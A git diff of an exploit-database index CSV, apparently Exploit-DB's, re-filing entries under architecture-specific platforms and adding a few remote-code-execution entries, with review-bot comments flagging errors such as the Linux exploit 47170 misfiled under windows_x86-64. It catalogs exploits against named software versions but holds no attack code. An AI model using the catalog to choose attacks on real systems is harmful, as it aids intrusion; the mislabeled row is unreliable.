@@ -10204,7 +10204,7 @@ id,file,description,date,author,type,platform,port 41607,exploits/windows/local/41607.cs,"Microsoft Windows - COM Session Moniker Privilege Escalation (MS17-012)",2017-03-15,"Google Security Research",local,windows, 41619,exploits/windows/local/41619.txt,"Microsoft Windows DVD Maker 6.1.7 - XML External Entity Injection",2017-03-16,hyp3rlinx,local,windows, 43359,exploits/linux/local/43359.c,"Firejail < 0.9.44.4 / < 0.9.38.8 LTS - Local Sandbox Escape",2017-01-04,"Sebastian Krahmer",local,linux, -43366,exploits/windows/local/43366.md,"TeamViewer 11 < 13 (Windows 10 x86) - Inline Hooking / Direct Memory Modification Permission Change",2017-12-04,gellin,local,windows, +43366,exploits/windows_x86/local/43366.md,"TeamViewer 11 < 13 (Windows 10 x86) - Inline Hooking / Direct Memory Modification Permission Change",2017-12-04,gellin,local,windows_x86, 43390,exploits/windows/local/43390.txt,"Ubiquiti UniFi Video 3.7.3 - Local Privilege Escalation",2017-12-26,"Julien Ahrens",local,windows, 43397,exploits/hardware/local/43397.md,"Sony Playstation 4 (PS4) 4.05 - 'Jailbreak' WebKit / 'NamedObj ' Kernel Loader",2017-12-27,Specter,local,hardware, 43418,exploits/linux/local/43418.c,"Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP)",2017-08-13,"Andrey Konovalov",local,linux, 
@@ -10342,7 +10342,7 @@ id,file,description,date,author,type,platform,port 42425,exploits/windows/local/42425.txt,"VirtualBox 5.1.22 - Windows Process DLL Signature Bypass Privilege Escalation",2017-08-03,"Google Security Research",local,windows, 42426,exploits/windows/local/42426.txt,"VirtualBox 5.1.22 - Windows Process DLL UNC Path Signature Bypass Privilege Escalation",2017-08-03,"Google Security Research",local,windows, 42429,exploits/windows/local/42429.py,"Microsoft Windows - '.LNK' Shortcut File Code Execution",2017-08-06,nixawk,local,windows, -42432,exploits/windows/local/42432.cpp,"Microsoft Windows 7 SP1 x86 - GDI Palette Objects Local Privilege Escalation (MS17-017)",2017-07-19,Saif,local,windows, +42432,exploits/windows_x86/local/42432.cpp,"Microsoft Windows 7 SP1 (x86) - GDI Palette Objects Local Privilege Escalation (MS17-017)",2017-07-19,Saif,local,windows_x86, 42435,exploits/windows_x86-64/local/42435.txt,"Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098) (2)",2017-08-08,SensePost,local,windows_x86-64, 42454,exploits/macos/local/42454.txt,"Xamarin Studio for Mac 6.2.1 (build 3) / 6.3 (build 863) - Local Privilege Escalation",2017-08-14,Securify,local,macos, 42455,exploits/windows/local/42455.py,"ALLPlayer 7.4 - Local Buffer Overflow (SEH Unicode)",2017-08-15,f3ci,local,windows, 
@@ -10373,7 +10373,7 @@ id,file,description,date,author,type,platform,port 42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows, 42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows, 42921,exploits/windows/local/42921.py,"Dup Scout Enterprise 10.0.18 - 'Import Command' Local Buffer Overflow",2017-09-29,"Touhid M.Shaikh",local,windows, -42930,exploits/windows/local/42930.txt,"Microsoft Word 2007 (x86) - Information Disclosure",2017-09-30,"Eduardo Braun Prado",local,windows, +42930,exploits/windows_x86/local/42930.txt,"Microsoft Word 2007 (x86) - Information Disclosure",2017-09-30,"Eduardo Braun Prado",local,windows_x86, 42936,exploits/linux/local/42936.md,"UCOPIA Wireless Appliance < 5.1.8 - Local Privilege Escalation",2017-10-02,Sysdream,local,linux, 42937,exploits/linux/local/42937.md,"UCOPIA Wireless Appliance < 5.1.8 - Restricted Shell Escape",2017-10-02,Sysdream,local,linux, 42948,exploits/osx/local/42948.txt,"Apple Mac OS X + Safari - Local Javascript Quarantine Bypass",2017-07-15,"Filippo Cavallarin",local,osx, 
@@ -10391,7 +10391,7 @@ id,file,description,date,author,type,platform,port 43109,exploits/windows/local/43109.c,"Vir.IT eXplorer Anti-Virus 8.5.39 - 'VIAGLT64.SYS' Local Privilege Escalation",2017-11-01,"Parvez Anwar",local,windows, 43127,exploits/linux/local/43127.c,"Linux Kernel 4.13 (Ubuntu 17.10) - 'waitid()' SMEP/SMAP/Chrome Sandbox Privilege Escalation",2017-11-06,"Chris Salls",local,linux, 43134,exploits/windows/local/43134.c,"Symantec Endpoint Protection 12.1 - Tamper-Protection Bypass",2017-11-10,hyp3rlinx,local,windows, -43139,exploits/windows/local/43139.c,"IKARUS anti.virus 2.16.7 - 'ntguard_x64' Local Privilege Escalation",2017-11-13,"Parvez Anwar",local,windows, +43139,exploits/windows_x86-64/local/43139.c,"IKARUS anti.virus 2.16.7 - 'ntguard_x64' Local Privilege Escalation",2017-11-13,"Parvez Anwar",local,windows_x86-64, 43156,exploits/windows/local/43156.py,"VX Search 10.2.14 - 'Proxy' Local Buffer Overflow (SEH)",2017-11-16,wetw0rk,local,windows, 43162,exploits/windows/local/43162.txt,"Microsoft Windows 10 - CiSetFileCache TOCTOU Security Feature Bypass",2017-11-20,"Google Security Research",local,windows, 43179,exploits/windows/local/43179.py,"ALLPlayer 7.5 - Local Buffer Overflow (SEH Unicode)",2017-11-25,sickness,local,windows, 
@@ -10430,7 +10430,7 @@ id,file,description,date,author,type,platform,port 44205,exploits/linux/local/44205.md,"Linux Kernel - 'BadIRET' Local Privilege Escalation",2017-07-24,"Ren Kimura",local,linux, 44206,exploits/hardware/local/44206.c,"Sony Playstation 4 (PS4) 1.76 - 'dlclose' Linux Kernel Loader",2016-04-27,"Carlos Pizarro",local,hardware, 44224,exploits/windows/local/44224.py,"iSumsoft ZIP Password Refixer 3.1.1 - Buffer Overflow",2018-03-02,ScrR1pTK1dd13,local,windows, -38457,exploits/windows/local/38457.c,"ASX to MP3 Converter 1.82.50 (Windows 2003 x86) - '.asx' Local Stack Overflow",2015-10-17,"Ivan Ivanovic",local,windows, +38457,exploits/windows_x86/local/38457.c,"ASX to MP3 Converter 1.82.50 (Windows 2003 x86) - '.asx' Local Stack Overflow",2015-10-17,"Ivan Ivanovic",local,windows_x86, 44234,exploits/macos/local/44234.c,"Apple macOS High Sierra 10.13 - 'ctl_ctloutput-leak' Information Leak",2017-12-07,"Brandon Azad",local,macos, 44237,exploits/macos/local/44237.md,"Apple macOS Sierra 10.12.1 - 'physmem' Local Privilege Escalation",2017-01-16,"Brandon Azad",local,macos, 44239,exploits/osx/local/44239.md,"Apple OS X 10.10.5 - 'rootsh' Local Privilege Escalation",2016-05-16,"Brandon Azad",local,osx, 
@@ -10445,9 +10445,9 @@ id,file,description,date,author,type,platform,port 44279,exploits/linux/local/44279.py,"SC 7.16 - Stack-Based Buffer Overflow",2018-03-12,"Juan Sacco",local,linux, 44282,exploits/hardware/local/44282.txt,"Sony Playstation 4 (PS4) 4.55 < 5.50 - WebKit Code Execution (PoC)",2018-03-10,qwertyoruiop,local,hardware, 44298,exploits/linux/local/44298.c,"Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation",2018-03-16,"Bruce Leidl",local,linux, -44299,exploits/linux/local/44299.c,"Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privilege Escalation",2015-08-26,"Vitaly Nikolenko",local,linux, -44300,exploits/linux/local/44300.c,"Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation",2016-07-04,"Vitaly Nikolenko",local,linux, -44302,exploits/linux/local/44302.c,"Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation",2017-10-16,"Jeremy Huang",local,linux, +44299,exploits/linux_x86-64/local/44299.c,"Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privilege Escalation",2015-08-26,"Vitaly Nikolenko",local,linux_x86-64, +44300,exploits/linux_x86-64/local/44300.c,"Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation",2016-07-04,"Vitaly Nikolenko",local,linux_x86-64, +44302,exploits/linux_x86-64/local/44302.c,"Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation",2017-10-16,"Jeremy Huang",local,linux_x86-64, 44303,exploits/linux/local/44303.c,"Linux Kernel 4.13 (Debian 9) - Local Privilege Escalation",2017-12-11,anonymous,local,linux, 44306,exploits/hardware/local/44306.c,"Huawei Mate 7 - '/dev/hifi_misc' Privilege Escalation",2016-01-24,pray3r,local,hardware, 44307,exploits/macos/local/44307.m,"Google Software Updater macOS - Unsafe use of Distributed Objects Privilege Escalation",2018-03-20,"Google Security Research",local,macos, 
@@ -10511,7 +10511,7 @@ id,file,description,date,author,type,platform,port 44697,exploits/windows/local/44697.txt,"Microsoft Windows - 'POP/MOV SS' Privilege Escalation",2018-05-22,"Can Bölük",local,windows, 46070,exploits/windows_x86/local/46070.py,"Ayukov NFTP FTP Client 2.0 - Buffer Overflow",2019-01-02,"Uday Mittal",local,windows_x86, 44713,exploits/windows/local/44713.py,"FTPShell Server 6.80 - Buffer Overflow (SEH)",2018-05-23,"Hashim Jawad",local,windows, -44741,exploits/windows/local/44741.html,"Microsoft Internet Explorer 11 (Windows 7 x64/x86) - vbscript Code Execution",2018-05-21,smgorelik,local,windows, +44741,exploits/windows/local/44741.html,"Microsoft Internet Explorer 11 (Windows 7 x86/x64) - vbscript Code Execution",2018-05-21,smgorelik,local,windows, 44742,exploits/windows/local/44742.txt,"Flash ActiveX 18.0.0.194 - Code Execution",2018-02-13,smgorelik,local,windows, 44743,exploits/windows/local/44743.html,"Microsoft Internet Explorer 11 - javascript Code Execution",2016-02-01,checkpoint,local,windows, 44744,exploits/windows/local/44744.txt,"Flash ActiveX 28.0.0.137 - Code Execution (1)",2016-02-16,smgorelik,local,windows, 
@@ -10621,7 +10621,7 @@ id,file,description,date,author,type,platform,port 45501,exploits/windows/local/45501.txt,"EE 4GEE Mini EE40_00_02.00_44 - Privilege Escalation",2018-09-27,"Osanda Malith Jayathissa",local,windows, 45503,exploits/windows_x86-64/local/45503.txt,"PCProtect 4.8.35 - Privilege Escalation",2018-09-28,"Hashim Jawad",local,windows_x86-64, 45505,exploits/windows_x86/local/45505.py,"Zahir Enterprise Plus 6 build 10b - Buffer Overflow (SEH)",2018-10-01,SPARC,local,windows_x86, -45516,exploits/linux/local/45516.c,"Linux Kernel 2.6.x / 3.10.x / 4.14.x (RedHat / Debian / CentOS) (x64) - 'Mutagen Astronomy' Local Privilege Escalation",2018-09-26,"Qualys Corporation",local,linux, +45516,exploits/linux_x86-64/local/45516.c,"Linux Kernel 2.6.x / 3.10.x / 4.14.x (RedHat / Debian / CentOS) (x64) - 'Mutagen Astronomy' Local Privilege Escalation",2018-09-26,"Qualys Corporation",local,linux_x86-64, 45528,exploits/linux/local/45528.txt,"virtualenv 16.0.0 - Sandbox Escape",2018-10-04,vr_system,local,linux, 45531,exploits/windows_x86/local/45531.py,"NICO-FTP 3.0.1.19 - Buffer Overflow (SEH) (ASLR Bypass)",2018-10-04,"Miguel Mendez Z",local,windows_x86, 45548,exploits/linux/local/45548.txt,"Git Submodule - Arbitrary Code Execution (PoC)",2018-10-05,"Junio C Hamano",local,linux, 
@@ -10648,7 +10648,7 @@ id,file,description,date,author,type,platform,port 45709,exploits/windows_x86-64/local/45709.vb,"School Equipment Monitoring System 1.0 - 'login' SQL Injection",2018-10-29,"Ihsan Sencan",local,windows_x86-64, 45710,exploits/windows_x86/local/45710.pl,"Modbus Slave PLC 7 - '.msw' Buffer Overflow (PoC)",2018-10-29,"Kağan Çapar",local,windows_x86, 45715,exploits/linux/local/45715.txt,"systemd - 'chown_one()' Dereference Symlinks",2018-10-29,"Google Security Research",local,linux, -45738,exploits/windows/local/45738.py,"R 3.4.4 (Windows 10 x64) - Buffer Overflow (DEP/ASLR Bypass)",2018-10-30,"Charles Truscott",local,windows, +45738,exploits/windows_x86-64/local/45738.py,"R 3.4.4 (Windows 10 x64) - Buffer Overflow (DEP/ASLR Bypass)",2018-10-30,"Charles Truscott",local,windows_x86-64, 45742,exploits/openbsd/local/45742.sh,"xorg-x11-server 1.20.3 - Privilege Escalation",2018-10-30,"Marco Ivaldi",local,openbsd, 45744,exploits/windows/local/45744.rb,"Any Sound Recorder 2.93 - Buffer Overflow Local (SEH) (Metasploit)",2018-10-30,d3ckx1,local,windows, 45765,exploits/windows/local/45765.txt,"Anviz AIM CrossChex Standard 4.3 - CSV Injection",2018-11-02,LiquidWorm,local,windows, 
@@ -10720,7 +10720,7 @@ id,file,description,date,author,type,platform,port 46189,exploits/windows/local/46189.txt,"Check Point ZoneAlarm 8.8.1.110 - Local Privilege Escalation",2019-01-17,"Chris Anastasio",local,windows, 46222,exploits/windows/local/46222.txt,"Microsoft Windows CONTACT - HTML Injection / Remote Code Execution",2019-01-23,hyp3rlinx,local,windows, 46241,exploits/linux/local/46241.rb,"AddressSanitizer (ASan) - SUID Executable Privilege Escalation (Metasploit)",2019-01-24,Metasploit,local,linux, -46249,exploits/linux/local/46249.py,"MySQL User-Defined (Linux) (x32/x86_64) - 'sys_exec' Local Privilege Escalation",2019-01-28,d7x,local,linux, +46249,exploits/linux_x86/local/46249.py,"MySQL User-Defined (Linux) (x86) - 'sys_exec' Local Privilege Escalation",2019-01-28,d7x,local,linux_x86, 46255,exploits/windows/local/46255.py,"Easy Video to iPod Converter 1.6.20 - Buffer Overflow (SEH)",2019-01-28,"Nawaf Alkeraithe",local,windows, 46265,exploits/windows/local/46265.py,"R 3.4.4 XP SP3 - Buffer Overflow (Non SEH)",2019-01-28,"Dino Covotsos",local,windows, 46267,exploits/windows/local/46267.py,"BEWARD Intercom 2.3.1 - Credentials Disclosure",2019-01-28,LiquidWorm,local,windows, 
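Review bot: the 46249 change in the @@ -10720 hunk narrows the entry's stated coverage. The old description reads "MySQL User-Defined (Linux) (x32/x86_64)", i.e. both 32-bit and 64-bit, yet the new row is filed under `exploits/linux_x86/local/46249.py` with platform `linux_x86` and the description now says "(x86)" only. Elsewhere in this same patch, multi-architecture entries keep the generic platform (44741 "Windows 7 x86/x64" stays under `windows`, 13261 "FreeBSD x86/x64" stays under `freebsd`), so unless the exploit really is 32-bit only, keep it at `exploits/linux/local/46249.py` with platform `linux` and restore the "(x86/x64)" wording; if it is 32-bit only, the commit message should say why the description was narrowed.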
@@ -10746,7 +10746,7 @@ id,file,description,date,author,type,platform,port 46428,exploits/macos/local/46428.m,"Apple macOS 10.13.5 - Local Privilege Escalation",2019-02-13,Synacktiv,local,macos, 46479,exploits/windows/local/46479.txt,"Cisco WebEx Meetings < 33.6.6 / < 33.9.1 - Privilege Escalation",2019-03-01,SecureAuth,local,windows, 46437,exploits/windows/local/46437.txt,"Memu Play 6.0.7 - Privilege Escalation",2019-02-21,"Alejandra Sánchez",local,windows, -46507,exploits/windows/local/46507.py,"Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)",2019-03-07,Hodorsec,local,windows, +46507,exploits/windows_x86/local/46507.py,"Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)",2019-03-07,Hodorsec,local,windows_x86, 46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64, 46522,exploits/hardware/local/46522.md,"Sony Playstation 4 (PS4) < 6.20 - WebKit Code Execution (PoC)",2019-03-08,Specter,local,hardware, 46530,exploits/windows/local/46530.py,"NetSetMan 4.7.1 - Local Buffer Overflow (SEH Unicode)",2019-03-11,"Devin Casadey",local,windows, 
@@ -10803,10 +10803,10 @@ id,file,description,date,author,type,platform,port 46879,exploits/solaris/local/46879.c,"Solaris 7/8/9 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2)",2019-05-20,"Marco Ivaldi",local,solaris, 47147,exploits/linux/local/47147.txt,"Docker - Container Escape",2019-07-19,dominikczarnotatob,local,linux, 46916,exploits/windows/local/46916.txt,"Microsoft Windows 10 (17763.379) - Install DLL",2019-05-23,SandboxEscaper,local,windows, -46917,exploits/windows/local/46917.txt,"Microsoft Windows (x84/x64) - 'Error Reporting' Discretionary Access Control List / Local Privilege Escalation",2019-05-22,SandboxEscaper,local,windows, +46917,exploits/windows/local/46917.txt,"Microsoft Windows (x86/x64) - 'Error Reporting' Discretionary Access Control List / Local Privilege Escalation",2019-05-22,SandboxEscaper,local,windows, 46912,exploits/windows/local/46912.txt,"Microsoft Windows 10 1809 - 'CmKeyBodyRemapToVirtualForEnum' Arbitrary Key Enumeration Privilege Escalation",2019-05-23,"Google Security Research",local,windows, 46914,exploits/macos/local/46914.rb,"Apple Mac OS X - Feedback Assistant Race Condition (Metasploit)",2019-05-23,Metasploit,local,macos, -46918,exploits/windows/local/46918.txt,"Microsoft Windows (x86) - Task Scheduler' .job' Import Arbitrary Discretionary Access Control List Write / Local Privilege Escalation",2019-05-22,SandboxEscaper,local,windows, +46918,exploits/windows_x86/local/46918.txt,"Microsoft Windows (x86) - Task Scheduler' .job' Import Arbitrary Discretionary Access Control List Write / Local Privilege Escalation",2019-05-22,SandboxEscaper,local,windows_x86, 46919,exploits/windows/local/46919.txt,"Microsoft Internet Explorer 11 - Sandbox Escape",2019-05-22,SandboxEscaper,local,windows, 46920,exploits/windows/local/46920.txt,"Microsoft Windows - 'Win32k' Local Privilege Escalation",2019-05-15,Arch-Vile,local,windows, 46922,exploits/windows/local/46922.py,"Axessh 4.2 - 'Log file name' Local Stack-based Buffer 
Overflow",2019-05-24,"Uday Mittal",local,windows, @@ -10832,7 +10832,7 @@ id,file,description,date,author,type,platform,port 47105,exploits/windows/local/47105.py,"SNMPc Enterprise Edition 9/10 - Mapping Filename Buffer Overflow",2019-07-11,xerubus,local,windows, 47115,exploits/windows/local/47115.txt,"Microsoft Windows 10.0.17134.648 - HTTP -> SMB NTLM Reflection Leads to Privilege Elevation",2019-07-12,"Google Security Research",local,windows, 47116,exploits/windows/local/47116.py,"Streamripper 2.6 - 'Song Pattern' Buffer Overflow",2019-07-15,"Andrey Stoykov",local,windows, -47122,exploits/windows/local/47122.py,"R 3.4.4 (Windows 10 x64) - Buffer Overflow SEH (DEP/ASLR Bypass)",2019-07-16,blackleitus,local,windows, +47122,exploits/windows_x86-64/local/47122.py,"R 3.4.4 (Windows 10 x64) - Buffer Overflow SEH (DEP/ASLR Bypass)",2019-07-16,blackleitus,local,windows_x86-64, 47126,exploits/windows/local/47126.py,"DameWare Remote Support 12.0.0.509 - 'Host' Buffer Overflow (SEH)",2019-07-16,"Xavi Beltran",local,windows, 47128,exploits/windows/local/47128.rb,"Microsoft Windows 10 < build 17763 - AppXSvc Hard Link Privilege Escalation (Metasploit)",2019-07-16,Metasploit,local,windows, 47133,exploits/linux/local/47133.txt,"Linux - Broken Permission and Object Lifetime Handling for PTRACE_TRACEME",2019-07-17,"Google Security Research",local,linux, 
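Review bot: in the @@ -10803 hunk the 46918 row is rewritten but keeps the misplaced quoting in its description, "Task Scheduler' .job' Import"; since the line is being touched anyway, fix it to "Task Scheduler '.job' Import" to match the quoting style of the neighbouring rows ('Error Reporting' in 46917, 'Win32k' in 46920).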
@@ -10846,13 +10846,13 @@ id,file,description,date,author,type,platform,port 47167,exploits/linux/local/47167.sh,"Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege Escalation (polkit Method)",2019-01-04,bcoles,local,linux, 47168,exploits/linux/local/47168.c,"Linux Kernel 4.8.0-34 < 4.8.0-45 (Ubuntu / Linux Mint) - Packet Socket Local Privilege Escalation",2018-12-29,bcoles,local,linux, 47169,exploits/linux/local/47169.c,"Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privilege Escalation (KASLR / SMEP)",2018-12-29,bcoles,local,linux, -47170,exploits/linux/local/47170.c,"Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation",2018-12-29,bcoles,local,linux, +47170,exploits/windows_x86-64/local/47170.c,"Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x64) - 'AF_PACKET' Race Condition Privilege Escalation",2018-12-29,bcoles,local,windows_x86-64, 47171,exploits/multiple/local/47171.sh,"VMware Workstation/Player < 12.5.5 - Local Privilege Escalation",2018-12-30,bcoles,local,multiple, 47172,exploits/multiple/local/47172.sh,"S-nail < 14.8.16 - Local Privilege Escalation",2019-01-13,bcoles,local,multiple, 47175,exploits/multiple/local/47175.sh,"Deepin Linux 15 - 'lastore-daemon' Local Privilege Escalation",2018-12-30,bcoles,local,multiple, 47173,exploits/multiple/local/47173.sh,"Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (2)",2019-01-13,bcoles,local,multiple, 47174,exploits/multiple/local/47174.sh,"ASAN/SUID - Local Privilege Escalation",2019-01-12,bcoles,local,multiple, -47176,exploits/windows/local/47176.cpp,"Microsoft Windows 7 build 7601 (x86) - Local Privilege Escalation",2019-07-26,ShivamTrivedi,local,windows, +47176,exploits/windows_x86/local/47176.cpp,"Microsoft Windows 7 build 7601 (x86) - Local Privilege Escalation",2019-07-26,ShivamTrivedi,local,windows_x86, 47197,exploits/multiple/local/47197.rb,"SilverSHielD 6.x - Local 
Privilege Escalation",2019-08-01,"Ian Bredemeyer",local,multiple, 47231,exploits/linux/local/47231.py,"Ghidra (Linux) 9.0.4 - .gar Arbitrary Code Execution",2019-08-12,"Etienne Lacoche",local,linux, 47238,exploits/windows/local/47238.ps1,"Steam Windows Client - Local Privilege Escalation",2019-08-12,AbsoZed,local,windows, @@ -11075,7 +11075,7 @@ id,file,description,date,author,type,platform,port 48293,exploits/windows/local/48293.py,"Triologic Media Player 8 - '.m3l' Buffer Overflow (Unicode) (SEH)",2020-04-06,"Felipe Winsnes",local,windows, 48299,exploits/windows/local/48299.txt,"Microsoft NET USE win10 - Insufficient Authentication Logic",2020-04-06,hyp3rlinx,local,windows, 48306,exploits/windows/local/48306.txt,"Windscribe 1.83 - 'WindscribeService' Unquoted Service Path",2020-04-10,MgThuraMoeMyint,local,windows, -48314,exploits/windows/local/48314.py,"Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH)",2020-04-13,boku,local,windows, +48314,exploits/windows_x86/local/48314.py,"Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH)",2020-04-13,boku,local,windows_x86, 48317,exploits/windows/local/48317.py,"B64dec 1.1.2 - Buffer Overflow (SEH Overflow + Egg Hunter)",2020-04-14,"Andy Bowden",local,windows, 48329,exploits/windows/local/48329.py,"BlazeDVD 7.0.2 - Buffer Overflow (SEH)",2020-04-15,areyou1or0,local,windows, 48337,exploits/macos/local/48337.rb,"VMware Fusion - USB Arbitrator Setuid Privilege Escalation (Metasploit)",2020-04-16,Metasploit,local,macos, 
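Review bot: the 47170 row in the @@ -10846 hunk is moved to the wrong platform. Its description is "Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x64) - 'AF_PACKET' Race Condition Privilege Escalation", a Linux kernel exploit, but the new path is `exploits/windows_x86-64/local/47170.c` with platform `windows_x86-64`. It should be `exploits/linux_x86-64/local/47170.c` with platform `linux_x86-64`, as this patch does for the other x64 Linux kernel entries (44299, 44300, 44302, 45516), and the on-disk move of 47170.c must land in that same directory or the CSV path will not resolve.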
@@ -11084,7 +11084,7 @@ id,file,description,date,author,type,platform,port 48346,exploits/windows/local/48346.py,"Atomic Alarm Clock 6.3 - Stack Overflow (Unicode+SEH)",2020-04-20,boku,local,windows, 48350,exploits/windows/local/48350.py,"Nsauditor 3.2.1.0 - Buffer Overflow (SEH+ASLR bypass (3 bytes overwrite))",2020-04-20,Cervoise,local,windows, 48351,exploits/windows/local/48351.py,"Rubo DICOM Viewer 2.0 - Buffer Overflow (SEH)",2020-04-20,bzyo,local,windows, -48352,exploits/windows/local/48352.txt,"Atomic Alarm Clock x86 6.3 - 'AtomicAlarmClock' Unquoted Service Path",2020-04-20,boku,local,windows, +48352,exploits/windows_x86/local/48352.txt,"Atomic Alarm Clock x86 6.3 - 'AtomicAlarmClock' Unquoted Service Path",2020-04-20,boku,local,windows_x86, 48359,exploits/solaris/local/48359.c,"Oracle Solaris Common Desktop Environment 1.6 - Local Privilege Escalation",2020-04-21,"Marco Ivaldi",local,solaris, 48364,exploits/windows/local/48364.py,"RM Downloader 3.1.3.2.2010.06.13 - 'Load' Buffer Overflow (SEH)",2020-04-22,"Felipe Winsnes",local,windows, 48378,exploits/windows/local/48378.txt,"Popcorn Time 6.2 - 'Update service' Unquoted Service Path",2020-04-24,"Uriel Yochpaz",local,windows, 
@@ -17606,7 +17606,7 @@ id,file,description,date,author,type,platform,port 43411,exploits/windows/remote/43411.rb,"HP Mercury LoadRunner Agent magentproc.exe - Remote Command Execution (Metasploit)",2018-01-01,Metasploit,remote,windows,54345 43412,exploits/unix/remote/43412.rb,"Cambium ePMP1000 - 'ping' Shell via Command Injection (Metasploit)",2018-01-01,Metasploit,remote,unix, 43413,exploits/cgi/remote/43413.rb,"Cambium ePMP1000 - 'get_chart' Shell via Command Injection (Metasploit)",2018-01-01,Metasploit,remote,cgi, -44275,exploits/windows/remote/44275.txt,"DEWESoft X3 SP1 (64-bit) - Remote Command Execution",2018-03-12,hyp3rlinx,remote,windows, +44275,exploits/windows_x86-64/remote/44275.txt,"DEWESoft X3 SP1 (x64) - Remote Command Execution",2018-03-12,hyp3rlinx,remote,windows_x86-64, 43428,exploits/hardware/remote/43428.py,"Iopsys Router - 'dhcp' Remote Code Execution",2017-12-23,neonsea,remote,hardware, 43429,exploits/hardware/remote/43429.rb,"Linksys WVBR0-25 - User-Agent Command Execution (Metasploit)",2018-01-04,Metasploit,remote,hardware, 43430,exploits/linux/remote/43430.rb,"Xplico - Remote Code Execution (Metasploit)",2018-01-04,"Mehmet Ince",remote,linux,9876 
@@ -18222,6 +18222,7 @@ id,file,description,date,author,type,platform,port 48587,exploits/multiple/remote/48587.py,"SOS JobScheduler 1.13.3 - Stored Password Decryption",2020-06-15,"Sander Ubink",remote,multiple, 48620,exploits/hardware/remote/48620.txt,"mySCADA myPRO 7 - Hardcoded Credentials",2020-06-25,"Emre ÖVÜNÇ",remote,hardware, 48650,exploits/xml/remote/48650.txt,"Microsoft Windows mshta.exe 2019 - XML External Entity Injection",2020-07-07,hyp3rlinx,remote,xml, +48657,exploits/windows/remote/48657.py,"CompleteFTP Professional 12.1.3 - Remote Code Execution",2020-07-09,1F98D,remote,windows, 48661,exploits/linux/remote/48661.sh,"Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution",2020-07-10,SpicyItalian,remote,linux, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 
@@ -42650,6 +42651,7 @@ id,file,description,date,author,type,platform,port 48198,exploits/php/webapps/48198.txt,"Joomla! 3.9.0 < 3.9.7 - CSV Injection",2020-03-11,i4bdullah,webapps,php, 48199,exploits/php/webapps/48199.txt,"PlaySMS 1.4.3 - Template Injection / Remote Code Execution",2020-03-11,"Touhid M.Shaikh",webapps,php, 48200,exploits/php/webapps/48200.txt,"Wing FTP Server - Authenticated CSRF (Delete Admin)",2020-03-11,"Dhiraj Mishra",webapps,php, +48201,exploits/php/webapps/48201.py,"TeamCity Agent XML-RPC 10.0 - Remote Code Execution",2020-03-11,1F98D,webapps,php, 48202,exploits/php/webapps/48202.txt,"Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection",2020-03-12,"Milad karimi",webapps,php, 48203,exploits/java/webapps/48203.txt,"WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure",2020-03-12,"RedTeam Pentesting GmbH",webapps,java, 48204,exploits/php/webapps/48204.txt,"WordPress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection",2020-03-12,"Daniel Monzón",webapps,php, @@ -42961,3 +42963,4 @@ id,file,description,date,author,type,platform,port 48714,exploits/php/webapps/48714.txt,"pfSense 2.4.4-p3 - Cross-Site Request Forgery",2020-07-26,ghost_fh,webapps,php, 48715,exploits/php/webapps/48715.txt,"Virtual Airlines Manager 2.6.2 - Persistent Cross-Site Scripting",2020-07-26,"Peter Blue",webapps,php, 48716,exploits/ruby/webapps/48716.rb,"Rails 5.0.1 - Remote Code Execution",2020-07-26,"Lucas Amorim",webapps,ruby, +48720,exploits/php/webapps/48720.py,"eGroupWare 1.14 - 'spellchecker.php' Remote Command Execution",2020-07-27,"Berk KIRAS",webapps,php, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index b4f57a163..8eaee23cf 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv 
